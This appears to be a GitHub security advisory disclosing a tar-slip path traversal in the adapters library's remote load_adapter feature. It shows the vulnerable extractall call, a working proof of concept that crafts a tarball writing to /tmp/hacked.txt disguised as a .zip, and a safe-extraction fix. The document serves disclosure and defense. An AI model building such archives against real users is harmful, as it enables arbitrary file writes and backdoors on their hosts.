Tarslip path traversal via loading adapter from remote URL #828

@Vancir

Description

The adapters library supports loading adapters from remote URLs. When the downloaded file is recognized as a tarball, it is extracted with tarfile.extractall(...) directly into a target directory. An attacker-controlled tarball can include entries with absolute paths or ../ sequences that write files outside the extraction directory (tar-slip). Because the loader checks only tarfile.is_tarfile() and not the member paths, a malicious archive fetched from a remote URL can write arbitrary files on the victim host during load_adapter(...). The attacker can even disguise the archive by changing its extension (e.g., .zip) while retaining tar content.

Root cause

The vulnerable code calls tarfile.extractall() without validating member names:

elif tarfile.is_tarfile(output_path):
    tar_file = tarfile.open(output_path)
    tar_file.extractall(output_path_extracted)
    tar_file.close()

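Unless an extraction filter is in effect (Python 3.14 and later apply the "data" filter by default), tarfile.extractall extracts members with absolute paths or .. components as given. The loader performs no sanitization or canonical-path check to ensure that extracted paths remain inside output_path_extracted.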
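To make the missing check concrete, here is a small sketch of how a member name resolves once it is joined onto the extraction directory. The helper name resolve_member and the directory /srv/adapters/extracted are hypothetical, and posixpath is used so the result does not depend on the host OS. It only normalizes strings and does not account for symlinks.

```python
import posixpath


def resolve_member(dest_dir, member_name):
    """Return (target_path, stays_inside) for a member joined onto dest_dir."""
    # join() discards dest_dir entirely when member_name is absolute,
    # and normpath() collapses any ".." components.
    target = posixpath.normpath(posixpath.join(dest_dir, member_name))
    stays_inside = posixpath.commonpath([dest_dir, target]) == dest_dir
    return target, stays_inside


dest = "/srv/adapters/extracted"  # hypothetical extraction directory
for name in ("adapter_config.json", "/tmp/hacked.txt", "../../etc/cron.d/job"):
    target, inside = resolve_member(dest, name)
    print(f"{name!r:28} -> {target} (inside: {inside})")
```

Only the first name stays under the extraction directory; the absolute path and the ../ path both resolve elsewhere, which is the condition the loader never tests for.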

Proof of Concept

  1. Create a malicious tarball that contains a member with an absolute path (or a path containing ..):
import tarfile
from io import BytesIO

def create_malicious_tar(tar_path):
    with tarfile.open(tar_path, "w:gz") as tf:
        # file written to /tmp/hacked.txt on extraction
        info = tarfile.TarInfo(name="/tmp/hacked.txt")
        data = b"You have been hacked!\n"
        info.size = len(data)
        tf.addfile(info, fileobj=BytesIO(data))

        # include normal adapter files so archive looks legitimate
        info = tarfile.TarInfo(name="adapter_config.json")
        data = b'{"some":"config"}\n'
        info.size = len(data)
        tf.addfile(info, fileobj=BytesIO(data))

        info = tarfile.TarInfo(name="pytorch_adapter.bin")
        data = b"FAKEBINARY"
        info.size = len(data)
        tf.addfile(info, fileobj=BytesIO(data))

create_malicious_tar("adapter.tar.gz")
print("Created malicious tar: adapter.tar.gz")
  2. Host the malicious tarball online (the attacker can name it adapter.zip to disguise it).
  3. A user who finds the adapter archive loads it with the adapters library:
from adapters import AutoAdapterModel
model = AutoAdapterModel.from_pretrained("roberta-base")

url = "https://huggingface.co/XManFromXlab/adapters-load_adapters-tarslip/resolve/main/adapter.zip"
adapter_name = model.load_adapter(url)
  4. When load_adapter downloads the file and passes it to the tarfile branch, extractall writes /tmp/hacked.txt (or any crafted path) on the host. The archive can be crafted to overwrite arbitrary writable files or to place web shells or backdoors in predictable locations.

Note: tarfile.is_tarfile() returns True for tar content regardless of filename or extension, so a misleading extension does not prevent the attack.
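The extension point can be checked locally with a short sketch. It writes a harmless gzip-compressed tar under the name adapter.zip in a temporary directory and asks the standard library what it sees. The helper name write_tar_named_zip is hypothetical and not part of the adapters library.

```python
import io
import os
import tarfile
import tempfile
import zipfile


def write_tar_named_zip(directory):
    """Write a harmless .tar.gz archive under a misleading .zip filename."""
    path = os.path.join(directory, "adapter.zip")
    with tarfile.open(path, "w:gz") as tf:
        data = b'{"some":"config"}\n'
        info = tarfile.TarInfo(name="adapter_config.json")
        info.size = len(data)
        tf.addfile(info, fileobj=io.BytesIO(data))
    return path


with tempfile.TemporaryDirectory() as tmp:
    path = write_tar_named_zip(tmp)
    # Detection is based on file content, not on the filename.
    print("is_tarfile:", tarfile.is_tarfile(path))
    print("is_zipfile:", zipfile.is_zipfile(path))
```

Because detection is content-based, filtering on the URL's extension would not be a meaningful defense.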

Impact

This is a high-severity arbitrary file-write vulnerability. A remote attacker who can host an adapter archive (or trick users into loading one) can write files anywhere the process has write permission: plant persistent files, drop scripts, overwrite configuration or keys, or otherwise escalate to further compromise. The attack needs no further user interaction; merely calling load_adapter(url) on a maliciously crafted archive triggers the write.

Recommended fixes

Replace tarfile.extractall with a safe extractor that sanitizes member paths.
Refer to the implementation in Keras: https://github.com/keras-team/keras/blob/47d1cba8ece3cd0776d95e8007dbd0ad5a8c641a/keras/src/utils/file_utils.py#L56-L116
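As a rough illustration of what such an extractor could look like, the sketch below validates every member before anything is written, and additionally passes the standard library's "data" extraction filter on Python versions that provide it. The function name safe_extract is hypothetical; this is not the Keras implementation or the adapters library's actual fix. It rejects symbolic and hard links outright, which is stricter than some projects may want.

```python
import os
import tarfile


def safe_extract(archive_path, dest_dir):
    """Extract archive_path into dest_dir, refusing members that would escape it."""
    dest_root = os.path.realpath(dest_dir)
    with tarfile.open(archive_path) as tf:
        members = tf.getmembers()
        for member in members:
            # Links can redirect later writes, so this sketch refuses them.
            if member.issym() or member.islnk():
                raise ValueError(f"link member not allowed: {member.name!r}")
            # Only regular files and directories are expected in an adapter.
            if not (member.isfile() or member.isdir()):
                raise ValueError(f"unsupported member type: {member.name!r}")
            # Canonical-path check: the resolved target must stay in dest_root.
            target = os.path.realpath(os.path.join(dest_root, member.name))
            if os.path.commonpath([dest_root, target]) != dest_root:
                raise ValueError(f"member escapes destination: {member.name!r}")
        # Defense in depth: use the stdlib "data" filter where it exists.
        extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tf.extractall(dest_root, members=members, **extra)
```

In the vulnerable branch this would stand in for the open/extractall/close sequence, for example safe_extract(output_path, output_path_extracted). Validation runs over all members first, so a rejected archive leaves nothing behind in the destination.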
